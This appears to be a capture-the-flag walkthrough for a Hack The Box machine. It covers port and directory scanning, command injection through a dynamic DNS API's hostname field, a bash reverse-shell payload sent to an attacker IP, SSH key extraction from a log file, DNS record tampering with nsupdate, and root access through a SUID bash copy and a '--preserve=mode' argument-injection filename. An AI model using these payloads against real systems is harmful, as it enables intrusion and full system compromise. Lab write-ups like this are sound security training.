nmap -p- --min-rate 10000 10.10.10.244 -Pn
After identifying open ports (22,53,80), we can do greater nmap scan.
nmap -A -sC -sV -p22,53,80 10.10.10.244 -Pn
Directory enumeration.
gobuster dir -u http://10.10.10.244/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
I found '/nic' endpoint, let's brute-force also this endpoint.
gobuster dir -u http://10.10.10.244/nic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
If we browse the '/nic/update', it looks like API.
I just find API Documentation via no ip address included.
dynadns:sndanyd credentials are defualt ones for this API.
And hostname
field is vulnerable on this API.
As because.
curl -G --data-urlencode 'hostname=d.r.4.k.s' 'http://dynadns:sndanyd@10.10.10.244/nic/update'
Let's inject our reverse shell payload into this parameter.
But, we need to show our IP Address in another format.
curl -G --data-urlencode 'hostname=$(/bin/bash -c "bash -i >& /dev/tcp/168431619/1337 0>&1").no-ip.htb' 'http://dynadns:sndanyd@10.10.10.244/nic/update'
I got reverse shell from port (1337).
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
After enumeration, I find private key (id_rsa) from this file called 'strace-C62796521.txt' which located on '/home/bindmgr/support-case-C62796521'.
I read just id_rsa.
grep BEGIN strace-C62796521.txt | cut -d'"' -f2 | sed 's/\\n/\'$'\n''/g'
I just grab this id_rsa file to login into 'bindmgr' account, but it doesn't work.
As because, we need to add our public key into machine. For this, we need to update nameserver.
nsupdate -k /etc/bind/infra.key
server 127.0.0.1
zone dyna.htb
update add dr4ks.infra.dyna.htb 30 IN A 10.10.16.3
send
zone 10.in-addr.arpa
update add 3.16.10.10.in-addr.arpa 30 IN PTR dr4ks.infra.dyna.htb
send
After this, we can successfully login into machine.
ssh -i id_rsa bindmgr@10.10.10.244
user.txt
For privilege escalation, I just enumerate user via sudo -l
command.
This file has a script like below.
The script was looking for a file named, “.version” with version number. So, I created a file in /dev/shm directory
Then copied the /bin/bash into current directory gave the bash binary SUID bit and preserved the mode
cp /bin/bash .
chmod +s bash
echo > --preserve=mode
After execution of script via sudo /usr/local/bin/bindmgr.sh
, I see that '/bin/bash' binary has root privilege.
And runs this binary via -p
option to get root shell (/etc/bind/named.bindmgr/bash).
root.txt